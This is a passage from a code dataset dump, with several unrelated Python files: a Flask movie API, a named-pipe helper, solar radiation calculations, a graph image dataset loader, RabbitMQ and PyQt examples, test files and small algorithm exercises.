movie['imdb_rating'],\n 'metascore' : movie['metascore'],\n 'directors_ids' : movie['directors_ids'],\n 'imdb_rating' : movie['imdb_rating'],\n 'runtime' : movie['runtime'],\n 'budget' : movie['budget'],\n 'countrys' : movie['countrys']\n }\n return jsonify({'result' : output})\n\n@app.route('/director', methods=['GET'])\ndef get_all_directors():\n directors = mongo.db.directors_data\n output = []\n for director in directors.find({}):\n output.append({\n 'id' : director['id'],\n 'name' : director['name'],\n 'born_date' : director['born_date'],\n 'nationality' : director['nationality'],\n 'gender' : director['gender'],\n })\n return jsonify({'result' : output})\n\n@app.route('/director/', methods=['GET'])\ndef get_one_director(id):\n directors = mongo.db.directors_data\n director = directors.find_one_or_404({'id' : id})\n output = {\n 'id' : director['id'],\n 'name' : director['name'],\n 'born_date' : director['born_date'],\n 'nationality' : director['nationality'],\n 'gender' : director['gender'],\n }\n return jsonify({'result' : output})\n\nif __name__ == '__main__':\n app.run(host = '0.0.0.0', debug=True)\n","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225966070","text":"#===============================================================================\n# tempfifo.py\n#===============================================================================\n\n# Imports ======================================================================\n\nimport os\nimport tempfile\n\n\n\n\n# Classes ======================================================================\n\nclass NamedTemporaryFIFO():\n \"\"\"Create and return a temporary named pipe. The name of the pipe is\n accessible as the returned object's 'name' attribute. Can be used as a\n context manager. 
For example:\n \n with NamedTemporaryFIFO() as pipe:\n print(pipe.name)\n \n Upon exiting the context, the named pipe is removed unless the 'delete'\n parameter is set to False.\n\n Parameters\n ----------\n suffix : str or bytes\n as for tempfile.mkstemp\n prefix : sty or bytes\n as for tempfile.mkstemp\n dir : str or bytesq\n as for tempfile.mkstemp\n delete : bool\n whether the named pipe is deleted on exiting context (default True)\n open_read_end : bool\n whether the read end should be opened\n open_write_end : bool\n whetherthe write end should be opened\n\n Attributes\n ----------\n name : str\n filename of the temporary named pipe\n delete : bool\n whether the named pipe is deleted on exiting context (default True)\n read_end\n if open_read_end is True, the file descriptor of the read end of the\n pipe. Otherwise, None\n write_end\n if open_write_end is True, the file descriptor of the write end of the\n pipe. Otherwise, None\n \"\"\"\n\n def __init__(self, suffix=None, prefix=None, dir=None, delete: bool = True,\n open_read_end: bool = False, open_write_end: bool = False):\n with tempfile.NamedTemporaryFile(\n suffix=suffix, prefix=prefix, dir=dir\n ) as t:\n self.name = t.name\n self.delete = delete\n os.mkfifo(self.name)\n if open_read_end:\n self.read_end = os.open(self.name, os.O_RDONLY | os.O_NONBLOCK)\n else:\n self.read_end = None\n if open_write_end:\n self.write_end = os.open(self.name, os.O_WRONLY)\n else:\n self.write_end = None\n \n def __enter__(self):\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n if self.read_end is not None:\n self.close_read_end()\n if self.write_end is not None:\n self.close_write_end()\n if self.delete:\n os.unlink(self.name)\n\n return False\n\n def close_read_end(self):\n \"\"\"Close the file descriptor representing the pipe's read end\n \"\"\"\n \n os.close(self.read_end)\n self.read_end = None\n \n def close_write_end(self):\n \"\"\"Close the file descriptor representing the pipe's write 
end\n \"\"\"\n\n os.close(self.write_end)\n self.write_end = None\n \n def close(self):\n \"\"\"Close the file descriptors representing both ends of the pipe\n \"\"\"\n\n self.close_read_end()\n self.close_write_end()\n","sub_path":"tempfifo/tempfifo.py","file_name":"tempfifo.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212338738","text":"#!/usr/bin/env python\n \n#Serial version of solar energy calculations\n\n#Import modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import geopandas as gpd\nimport seaborn as sb\nimport time\n\n#Start timer\nstart_time = time.time();\n\n#Reading the excel data using pandas\ndata = np.array(pd.read_excel('solar_data.xlsx'));\n\n#Initializing the step operations by month and location\nmon = np.linspace(1,12,12,dtype=int);\nloc = np.linspace(0,236,237,dtype=int);\nst = np.linspace(0,49,50,dtype=int);\n\n#Parsing the latitude and state data\nlat = data[:,3];\nstate_raw = data[:,1];\n\n#Parsing the clearness index values\nKT = data[:,4:];\n\n#Useful constant\npi = np.pi;\ndtr = pi/180;\n\n#Matrix for land area of each state in sq. 
meters\narea = np.array([1477953,131171,134771,294207,403466,268431,12542,5047,138887,148959,16635,144669,214945,143793,92789,211754,102269,111898,20201,25142,79883,146435,206232,178040,121531,376962,125920,178711,198974,23187,19047,314161,284332,122057,105829,177660,248608,115883,2678,77857,196350,106798,676587,212818,102279,23871,172119,140268,62259,251470])*1000000;\n\n#Initializing the storage variables\nH_o_bar_loc = np.zeros((237,12));\nH_bar_loc = H_o_bar_loc;\nH_bar_state = np.zeros((50,12));\n\n#Beginning calculations by month by location\nfor i in mon:\n for j in loc:\n phi = lat[j];\n\n if i == 1:\n day = np.linspace(1,31,31);\n l = 31;\n elif i == 2:\n day = np.linspace(32,59,28);\n l = 28;\n elif i == 3:\n day = np.linspace(60,90,31);\n l = 31;\n elif i == 4:\n day = np.linspace(91,120,30);\n l = 30;\n elif i == 5:\n day = np.linspace(121,151,31);\n l = 31;\n elif i == 6:\n day = np.linspace(152,181,30);\n l = 30;\n elif i == 7:\n day = np.linspace(182,212,31);\n l = 31;\n elif i == 8:\n day = np.linspace(213,243,31);\n l = 31;\n elif i == 9:\n day = np.linspace(244,273,30);\n l = 30;\n elif i == 10:\n day = np.linspace(274,304,31);\n l = 31;\n elif i == 11:\n day = np.linspace(305,334,30);\n l = 30;\n else:\n day = np.linspace(335,365,31);\n l = 31;\n\n #Calculating the radiation on a horizontal surface for each day of the month\n H_o = np.linspace(0,l-1,l);\n a = 0; #step variable for storage\n for n in day:\n delta = 23.45 * np.sin(2*pi*(284+n)/365); #declination\n if -np.tan(phi*dtr)*np.tan(delta*dtr) > 1 or -np.tan(phi*dtr)*np.tan(delta*dtr) < -1:\n H_o[a] = 0;\n else:\n omega_s = np.degrees(np.arccos(-np.tan(phi*dtr)*np.tan(delta*dtr))); #sunset hour angle\n H_o[a] = (24*3600*1367/pi) * (1+0.033*np.cos(2*pi*n/365)) * ((np.cos(phi*dtr)*np.cos(delta*dtr)*np.sin(omega_s*dtr))+(omega_s*dtr*np.sin(phi*dtr)*np.sin(delta*dtr))); #radiation on a horizontal surface outside the Earth's atmosphere\n a = a + 1;\n\n #Take the daily average for the month and 
save\n H_o_bar_loc[j,i-1] = np.mean(H_o);\n\n#Calculate surface radiation by location\nH_bar_loc = np.multiply(KT,H_o_bar_loc);\n\n#Combine the values by state\nfor k in mon:\n p = -1;\n for m in st:\n n = 0;\n p = p+1;\n while state_raw[p] == state_raw[p+1] and p < 235:\n p = p+1;\n n = n+1;\n H_bar_state[m,k-1] = np.mean(H_bar_loc[p-n:p+1,k-1])/1000000;\n\n#Sorting by state\nstate = [];\nfor q in state_raw:\n if q not in state:\n state.append(q);\nstate = np.transpose(state);\n\n#Combine for all months and create data frame\nH_bar_state_year = np.mean(H_bar_state, axis=1);\nd_year = {'State': state, 'Value': H_bar_state_year};\ndf_year = pd.DataFrame(data=d_year);\nprint(df_year);\n\n#End timer\nend_time = time.time();\nprint(\"---%s seconds---\" %(end_time-start_time));\n\n","sub_path":"solar_ser_ng.py","file_name":"solar_ser_ng.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"131628069","text":"import math\nimport numpy as np\n\nimport torch\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torch_geometric.data import InMemoryDataset, Data\n\n\nclass ImageDataset(InMemoryDataset):\n def __init__(self,\n root,\n name,\n train=True,\n transform=None,\n pre_transform=None,\n pre_filter=None,\n coord=False,\n processed_file_prefix='data'):\n assert name in ['MNIST', 'CIFAR10'], \"Unsupported data name %s\" % name\n self.name = name\n self.coord = coord\n self.processed_file_prefix = processed_file_prefix\n self.traindata = None\n self.testdata = None\n super(ImageDataset, self).__init__(\n root, transform, pre_transform, pre_filter)\n path = self.processed_paths[0] if train else self.processed_paths[1]\n self.data, self.slices = torch.load(path)\n\n @property\n def raw_file_names(self):\n if self.name == 'MNIST':\n return ['t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte',\n 'train-images-idx3-ubyte', 'train-labels-idx1-ubyte']\n elif 
self.name == 'CIFAR10':\n return ['data_batch_1', 'data_batch_2', 'data_batch_3',\n 'data_batch_4', 'data_batch_5', 'test_batch']\n\n @property\n def processed_file_names(self):\n return ['%s_training.pt' % self.processed_file_prefix,\n '%s_test.pt' % self.processed_file_prefix]\n\n def download(self):\n transform = transforms.ToTensor()\n if self.name == 'CIFAR10':\n data_train = datasets.CIFAR10(root=self.raw_dir,\n transform=transform,\n train=True,\n download=True)\n data_test = datasets.CIFAR10(root=self.raw_dir,\n transform=transform,\n train=False,\n download=True)\n elif self.name == 'MNIST':\n data_train = datasets.MNIST(root=self.raw_dir,\n transform=transform,\n train=True,\n download=True)\n data_test = datasets.MNIST(root=self.raw_dir,\n transform=transform,\n train=False,\n download=True)\n else:\n raise ValueError(\"Unknown data name {}\".format(self.name))\n self.traindata = data_train\n self.testdata = data_test\n\n def process(self):\n trainLoader = torch.utils.data.DataLoader(self.traindata)\n testLoader = torch.utils.data.DataLoader(self.testdata)\n if self.name == 'MNIST':\n num_row, num_col = 28, 28\n elif self.name == 'CIFAR10':\n num_row, num_col = 32, 32\n else:\n raise ValueError('dataset error')\n num_edges = (3 * num_row - 2) * (3 * num_col - 2)\n edge_index_array = np.zeros(shape=[2, num_edges])\n edge_attr_array = np.zeros(shape=[1, num_edges])\n curt = 0\n for j in range(num_row):\n for k in range(num_col):\n for m in range(max(j-1, 0), min(j+1, num_row-1)+1):\n for n in range(max(k-1, 0), min(k+1, num_col-1)+1):\n edge_index_array[0][curt] = j * num_row + k\n edge_index_array[1][curt] = m * num_row + n\n edge_attr_array[0][curt] = self.weight(j, k, m, n)\n curt += 1\n edge_index = torch.from_numpy(edge_index_array).to(torch.int64)\n edge_attr = torch.from_numpy(edge_attr_array).to(torch.float)\n\n def transform_data(data_loader, edge_index, edge_attr):\n data_list = []\n channel, num_row, num_col = data_loader.dataset[0][0].size()\n 
if self.coord:\n x = torch.arange(num_col, dtype=torch.float)\n x = x.view((1, -1)).repeat(num_row, 1).view((-1, 1)) - x.mean()\n y = torch.arange(num_row, dtype=torch.float)\n y = y.view((-1, 1)).repeat(1, num_col).view((-1, 1)) - y.mean()\n coord = torch.cat([x, y], -1)\n\n for image, label in iter(data_loader):\n x = image[0].permute([1,2,0]).view(\n num_row * num_col, image[0].size()[0])\n if self.coord:\n x = torch.cat([x, coord], -1)\n data = Data(\n edge_index=edge_index, edge_attr=edge_attr, x=x, y=label)\n if self.pre_filter is not None:\n data = self.pre_filter(data)\n if self.pre_transform is not None:\n data = self.pre_transform(data)\n data_list.append(data)\n return data_list\n\n train_data_list = transform_data(trainLoader, edge_index, edge_attr)\n torch.save(self.collate(train_data_list), self.processed_paths[0])\n\n test_data_list = transform_data(testLoader, edge_index, edge_attr)\n torch.save(self.collate(test_data_list), self.processed_paths[1])\n\n @staticmethod\n def weight(pos_x, pos_y, pos_x_new, pos_y_new):\n dist = (pos_x - pos_x_new) ** 2 + (pos_y - pos_y_new) ** 2\n return math.exp(-dist)\n\n def __repr__(self):\n return '{}({})'.format(self.name, len(self))\n\n","sub_path":"semisupervised_TU/finetuning/image_dataset.py","file_name":"image_dataset.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"558651849","text":"import numpy as np\nimport cv2 as cv\n\n# Get image in color\n# img = cv.imread('./action.jpg', cv.IMREAD_COLOR)\n# Get image in gray scale\nimg = cv.imread('./action.jpg', cv.IMREAD_GRAYSCALE)\n# img = cv.imread('./action.jpg', cv.IMREAD_UNCHANGED)\n\n# Show image in window normal not in the image original dimensions\ncv.namedWindow('image', cv.WINDOW_NORMAL)\n\n# Show the image\ncv.imshow('image', img)\n\n# Wait infenitely if is zero\nk = cv.waitKey(0)\n\n# wait for ESC key to exit\nif k == 27:\n cv.destroyAllWindows()\n\n# 
wait for 's' key to save and exit\nelif k == ord('s'):\n # Save image\n cv.imwrite('image_output.png', img)\n cv.destroyAllWindows()\n","sub_path":"Images/read_image_demo.py","file_name":"read_image_demo.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597461739","text":"from PyEscape.escape_plan import escape\nfrom PyEscape.escape_points import fibonacci_spheres, points_on_cube_surface\nfrom PyEscape.escape_utility import sphere_vol_to_r\nfrom PyEscape.escape_points import random_points_on_hull\nfrom PyEscape.escape_points import random_points_on_ellipsoid\nfrom PyEscape.escape_polygonhelper import make_hull_and_scale\nimport pytest\nimport numpy as np\n\n\ndef test_escape():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, dt=1e-6)\n assert t\n\n\ndef test_escape_cube():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = points_on_cube_surface(1, r)\n t = escape(D, v, a, pores, shape='cube', dt=1e-6)\n assert t\n\n\ndef test_escape_ellipsoid():\n D = 400\n v = 1\n a = 0.1\n ABC = [3, 2, 1]\n pores = random_points_on_ellipsoid(ABC, v)\n t = escape(D, v, a, pores, shape='ellipsoid', dt=1e-6, ABC=ABC)\n assert t\n\n\ndef test_avg_escape_sphere_time():\n N = 10\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n ts = np.mean([escape(D, v, a, pores, dt=1e-6) for _ in range(N)])\n assert 0.001 < ts < 1\n\n\ndef test_timeout():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, dt=1e-6)\n assert int(t) == 0\n\n\ndef test_timeout_from_dt():\n D = 400\n v = 1\n a = 0.1\n r = sphere_vol_to_r(v)\n pores = fibonacci_spheres(1, r)\n t = escape(D, v, a, pores, max_steps=5, dt=1e-6)\n assert int(t) == 0\n\n\ndef test_escape_polygon():\n D = 400\n v = 1\n a = 0.1\n hull, _ = 
make_hull_and_scale(np.random.random((10, 3)))\n pores = random_points_on_hull(hull)\n t = escape(D, v, a, pores, dt=1e-6, hull=hull, shape='polygon')\n assert t\n","sub_path":"Testing/test_escape.py","file_name":"test_escape.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481247804","text":"# -*- coding:utf-8 -*-\r\n#\r\nimport pika\r\nfrom pika import spec\r\n\r\n# 创建简单的连接凭证\r\ncredentials = pika.PlainCredentials(\"test\", \"test\")\r\n# 连接参数\r\nhost = \"localhost\"\r\nhost = \"192.168.181.130\"\r\nport = 5672\r\nconn_params = pika.ConnectionParameters(host=host, port=port, credentials=credentials) # 没有指定virtual_host,使用默认的'/'\r\n# 建立一个实例\r\n# 1. 建立到代理服务器的连接\r\nconn_broker = pika.BlockingConnection(conn_params)\r\n\r\n# 2. 声明一个管道,在管道里发消息 # 获得信道\r\nchannel = conn_broker.channel()\r\n\r\n##################################################\r\nmsg_ids = []\r\n# 发送方确认模式处理器\r\n# def confirm_handler(frame):\r\n# if type(frame.method) == spec.Confirm.SelectOk:\r\n# print \"Channel in 'confirm' mode.\"\r\n# elif type(frame.method) == spec.Basic.Nack:\r\n# if frame.method.delivery_tag in msg_ids:\r\n# print 'Message lost!'\r\n# elif type(frame.method) == spec.Basic.Ack:\r\n# if frame.method.delivery_tag in msg_ids:\r\n# print 'Confirm received'\r\n# msg_ids.remove(frame.method.delivery_tag)\r\n#\r\n# channel.confirm_delivery(callback=confirm_handler)\r\n##################################################\r\n\r\n# 3. 声明交换器\r\nexchange = \"hello-exchange\"\r\nchannel.exchange_declare(exchange=exchange,\r\n exchange_type='direct',\r\n passive=False,\r\n durable=True,\r\n auto_delete=False)\r\n\r\n# 4. 
在管道里声明queue, 这一步没有 queuename 将和 routing_key 名称一样\r\nqueue_name = \"hello-queue\"\r\nrouting_key = \"hola-key\"\r\nchannel.queue_declare(queue=queue_name)\r\n# 通过键\"hola-key\"将队列和交换器绑定起来\r\nchannel.queue_bind(queue=queue_name,\r\n exchange=exchange,\r\n routing_key=routing_key)\r\n\r\n# 5. 创建文本消息\r\n# msg =sys.argv[1]\r\nmsg = u\"hello world 杨城\"\r\nmsg_props = pika.BasicProperties()\r\nmsg_props.content_type = \"text/plain\"\r\n\r\nchannel.basic_qos(prefetch_count=1) # 类似权重,按能力分发,如果有一个消息,就不在给你发\r\n\r\n# 6. 发布消息\r\nimport time\r\nwhile True:\r\n time.sleep(1)\r\n channel.basic_publish(body=msg,\r\n exchange=exchange,\r\n properties=msg_props,\r\n routing_key=routing_key)\r\n # msg_ids.append(len(msg_ids) + 1) #/(hwppc.5) Add ID to tracking list\r\n\r\nchannel.close()\r\n\r\n","sub_path":"RabbitMQ2/code/1.hello_producer.py","file_name":"1.hello_producer.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"378050775","text":"import sys\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QFileDialog, \\\n QLabel, QPushButton\n\n\nclass ScriptUI(QWidget):\n def __init__(self):\n super().__init__()\n\n self.label = QLabel()\n self.btn = QPushButton('File Open')\n\n self.InitUI()\n\n def InitUI(self):\n self.btn.clicked.connect(self.openFile)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.label, 3)\n hbox.addWidget(self.btn, 1)\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n vbox.addStretch(1)\n self.setLayout(vbox)\n\n def openFile(self):\n fname = QFileDialog.getOpenFileName(self, 'File Open', './config/script')\n self.label.setText(fname[0])\n if fname[0]:\n with open(fname[0], 'r') as f:\n data = f.read()\n","sub_path":"src/ScriptUI.py","file_name":"ScriptUI.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"516653285","text":"\nclass Solution(object):\n \"\"\"\n @ 
Google\n \n Given a non-empty string s and an abbreviation abbr, return whether the string matches with the given abbreviation.\n\n A string such as \"word\" contains only the following valid abbreviations:\n [\"word\", \"1ord\", \"w1rd\", \"wo1d\", \"wor1\", \"2rd\", \"w2d\", \"wo2\", \"1o1d\", \"1or1\", \"w1r1\", \"1o2\", \"2r1\", \"3d\", \"w3\", \"4\"]\n\n Notice that only the above abbreviations are valid abbreviations of the string \"word\". Any other string is not a valid abbreviation of \"word\".\n\n Note:\n Assume s contains only lowercase letters and abbr contains only lowercase letters and digits.\n\n Example 1:\n Given s = \"internationalization\", abbr = \"i12iz4n\":\n\n Return true.\n Example 2:\n Given s = \"apple\", abbr = \"a2e\":\n\n Return false.\n \"\"\"\n def validWordAbbreviation(self, word, abbr): # O(n) time\n \"\"\"\n :type word: str\n :type abbr: str\n :rtype: bool\n \"\"\"\n chars = \"abcdefghijklmnopqrstuvwxyz\"\n nums = \"0123456789\"\n if len(abbr) > len(word):\n return False\n word = word.lower()\n i, j = 0, 0\n while i < len(word) and j < len(abbr):\n if abbr[j].lower() in chars:\n if abbr[j].lower() == word[i]:\n i += 1\n j += 1\n else:\n return False\n elif abbr[j] == '0':\n return False\n elif abbr[j] in nums:\n k = j\n while k < len(abbr) and abbr[k] in nums:\n k += 1\n i += int(abbr[j:k])\n j = k\n if j == len(abbr) or i == len(word):\n break\n return i == len(word) and j == len(abbr)","sub_path":"src/string/leetcode408_ValidWordAbbreviation.py","file_name":"leetcode408_ValidWordAbbreviation.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57135706","text":"#\n#\tpython modular sorting animation\n#\tfile: mod_gen.py\n# description: mod_gen contains array manipulation functions\n# to create datasets for the sort animation\n#\tlicense: py-mod-sort/LICENSE (Apache 2.0)\n#\tby: Patrick Stanislaw Hadlaw\n#\n\nimport tkinter as 
tk\nimport random\nimport time\nimport math\nimport copy\n\n#\n# Array Generators\n#\n\ndef randomArray(size, flip = False):\n arr = list(range(size))\n for i in range(0, size*10):\n r1 = random.randint(0, size-1)\n r2 = random.randint(0, size-1)\n tmp = arr[r2]\n arr[r2] = arr[r1]\n arr[r1] = tmp\n if flip:\n return list(reversed(arr))\n else:\n return arr\n\ndef randomElement(size, flip = False):\n arr = []\n for i in range(0, size):\n arr.append(random.randint(0, size-1))\n if flip:\n return list(reversed(arr))\n else:\n return arr\n\ndef block(size, blocks, flip = False):\n blockLen = int(size / blocks)\n arr = []\n for i in range(1, blocks+1):\n for j in range(0, blockLen):\n arr.append(i*blockLen)\n if i + 1 > blocks and len(arr) enddate)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat':cat\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass YearHandler(webapp2.RequestHandler):\n def get(self):\n year = []\n x = int(start_year)\n year.append(x)\n for x in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n startdate = date(int(self.request.get('year')), 1, 1)\n enddate = date(int(self.request.get('year')), 12, 31)\n stories = Story.query().filter(Story.date >= startdate).order(-Story.date)\n stories = stories.filter(Story.date < enddate)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass CategoryHandler(webapp2.RequestHandler):\n def get(self):\n stories = Story.query().filter(Story.category == self.request.get('category')).order(-Story.date)\n year = []\n x = int(start_year)\n year.append(x)\n for x 
in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass TitleHandler(webapp2.RequestHandler):\n def get(self):\n stories = Story.query().filter(Story.title == self.request.get('title')).order(-Story.date)\n year = []\n x = int(start_year)\n year.append(x)\n for x in range(x, datetime.now().year):\n x = (x + 1)\n year.append(x)\n cat = []\n for s in stories:\n for i in s.category:\n if i not in cat and i != u'':\n cat.append(i)\n template_values = {\n 'stories': stories,\n 'year': year,\n 'cat': cat,\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\nclass CoverHandler(webapp2.RequestHandler):\n def get(self):\n template_values = {\n }\n template = jinja_environment.get_template('cover.html')\n self.response.out.write(template.render(template_values))\n\n#class ContactHandler(webapp2.RequestHandler):\n# def get(self):\n# email = self.request.get('email')\n# template_values = {\n# 'email': email,\n# }\n# template = jinja_environment.get_template('contact.html')\n# self.response.out.write(template.render(template_values))\n\nclass LocationHandler(webapp2.RequestHandler):\n def get(self):\n template_values = {\n }\n template = jinja_environment.get_template('location.html')\n self.response.out.write(template.render(template_values))\n\n# URL settings --------------------------------------------\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n #('/contact', ContactHandler),\n ('/location', LocationHandler),\n ('/month', MonthHandler),\n ('/year', YearHandler),\n ('/category', CategoryHandler),\n ('/title', TitleHandler),\n ('/cover', CoverHandler),\n ('/addstory', AddHandler),\n 
('/newstory', NewHandler),\n ('/liststories', ListHandler),\n ('/delstory', DelHandler),\n ('/editstory', EditHandler),\n ('/savestory', SaveHandler),\n ('/admin', ListHandler),\n ('/spm', PortfolioMailHandler),\n ('/unm', UnMailHandler),\n ('/maillist', MailListHandler),\n ('/delmail', DelMailHandler),\n ('/addmail', AddMailHandler),\n ('/savemail', SaveMailHandler),\n ('/purgemail', PurgeMailHandler),\n], debug=False)\n\n# Error handlers\napp.error_handlers[401] = Handler_401 # Wrong Authentication\napp.error_handlers[402] = Handler_402 # Requires some Payments to be done\napp.error_handlers[403] = Handler_403 # Authentication required, no public access\napp.error_handlers[404] = Handler_404 # Web page does not exist/Required content not found\napp.error_handlers[405] = Handler_405 # Method of sending data is not allowed\napp.error_handlers[500] = Handler_500 # Internal server error","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456701388","text":"import logging\n\nfrom osaapi import OSA\nimport requests\n\nfrom apslite_agent.config import get_config\nfrom apslite_agent.tasks import base\n\nlogger = logging.getLogger(__name__)\n\n\nclass CreateSession(base.Task):\n name = 'create_session'\n\n def __init__(self, config):\n self.openapi = config.get('openapi', {})\n self.rest_url = config.get('rest_url', '')\n\n def run(self):\n if not self.openapi:\n return self.result('Error', \"Improperly configured\")\n\n if self.data.get('version'):\n logger.info(\"Set account CCP account_id - %s version - %s\",\n self.data.get('account_id'),\n self.data.get('version'))\n\n api = OSA(**self.openapi)\n ret = api.am.setAccountCCPVersion(\n account_id=self.data.get('account_id'),\n ccp_version=self.data.get('version')\n )\n\n logger.info(\"result set version - %s\", ret)\n\n if 'error' in ret or ('status' in ret and ret['status'] != 0):\n 
error_message = ret['message'] if 'message' in ret else 'Error'\n return self.result('Error', error_message)\n\n url = 'http://{host}:{port}{url}'.format(\n host=self.openapi.get('host'),\n port=8080,\n url=self.data.get('url')\n )\n\n try:\n logger.info(\"Request to create OA session\")\n res = requests.post(url, timeout=20, verify=False)\n session_id = res.content.decode('utf-8').split('=')[1].replace('\\n', '')\n logger.info(\"Created OA session - %s\", session_id)\n except Exception as e:\n logger.exception(\"Failed to create session\")\n try:\n logger.debug(\"Response from OA: %s\", res.content)\n except:\n pass\n return self.result('Error', str(e))\n\n return self.result('OK', data={\n 'session_id': session_id\n })\n\n\ndef task_factory(**kwargs):\n c = get_config()\n oa = c.get('oa', {})\n\n return {\n CreateSession.name: CreateSession(oa)\n }\n","sub_path":"apslite_agent/tasks/create_session.py","file_name":"create_session.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138425948","text":"# python - problem 20\n\nimport math\nimport time\n\nt = time.time()\n\nmul1 = 1\nfor i in range(1,101):\n mul1 *= i\nmul2 = str(mul1)\nlength = len(mul2)\n\nsum = 0\nfor i in range(0, length):\n sum += int(mul2[i])\n\nprint(sum)\n\nt = time.time()-t\nprint( \"Spend time :\", t , \"sec\")","sub_path":"problem 020.py","file_name":"problem 020.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3760465","text":"'''\nLoaders for all object recognition pipelines\n'''\nfrom abc import ABCMeta, abstractmethod\n\nimport ecto\nfrom ecto_object_recognition.object_recognition_db import ObservationReader\nfrom object_recognition.common.utils import list_to_cpp_json_str\nfrom object_recognition.common.utils.json_helper import dict_to_cpp_json_str\n\nclass 
ObservationDealer(ecto.BlackBox):\n '''\n At each iteration, will return one fully typed observation, K,R,T,image,depth,mask, etc...\n Initialized with a predetermined set of observation ids.\n '''\n db_reader = ObservationReader\n def declare_params(self, p):\n p.declare('observation_ids', 'An iterable of observation ids.', [])\n p.declare('db_params', 'db parameters.', '')\n\n def declare_io(self, p, i, o):\n self.db_reader = ObservationReader(db_params=p.db_params)\n self.observation_dealer = ecto.Dealer(tendril=self.db_reader.inputs.at('observation'),\n iterable=p.observation_ids)\n o.forward_all('db_reader')\n\n def connections(self):\n graph = [self.observation_dealer[:] >> self.db_reader['observation']]\n return graph\n\nclass ModelBuilder(ecto.BlackBox):\n def __init__(self, source, incremental_model_builder, **kwargs):\n self.source = source\n self.incremental_model_builder = incremental_model_builder\n ecto.BlackBox.__init__(self, **kwargs)\n\n def declare_params(self, p):\n pass\n\n def declare_io(self, p, i, o):\n o.forward_all('incremental_model_builder')\n\n def connections(self):\n graph = []\n # Connect the model builder to the source\n for key in self.source.outputs.iterkeys():\n if key in self.incremental_model_builder.inputs.keys():\n graph += [self.source[key] >> self.incremental_model_builder[key]]\n return graph\n\nclass TrainingPipeline:\n ''' An abstract base class for creating object training pipelines.\n '''\n __metaclass__ = ABCMeta\n\n @classmethod\n def type_name(cls):\n '''\n Return the code name for your pipeline. eg. 
'TOD', 'LINEMOD', 'mesh', etc...\n '''\n raise NotImplementedError(\"The training pipeline class must return a string name.\")\n\n @abstractmethod\n def incremental_model_builder(self, submethod, pipeline_params, args):\n '''\n Given a dictionary of parameters, return a cell, or BlackBox that takes\n as input observations, and at each iteration and builds up a model\n on its output.\n '''\n raise NotImplementedError(\"This should return a cell .\")\n\n\n @abstractmethod\n def post_processor(self, submethod, pipeline_params, args):\n '''\n Given a dictionary of parameters, return a cell, or BlackBox that\n takes the output of the incremental_model_builder and converts it into\n a database document. You may do whatever post processing here.\n '''\n raise NotImplementedError(\"This should return a cell .\")\n\n\n @classmethod #see http://docs.python.org/library/abc.html#abc.ABCMeta.__subclasshook__\n def __subclasshook__(cls, C):\n if C is TrainingPipeline:\n #all pipelines must have atleast this function.\n if any(\"incremental_model_builder\" in B.__dict__ for B in C.__mro__):\n return True\n return NotImplemented\n\n @classmethod\n def train(cls, object_id, session_ids, observation_ids, submethod, pipeline_params, db_params, args=None):\n '''\n Returns a training plasm, 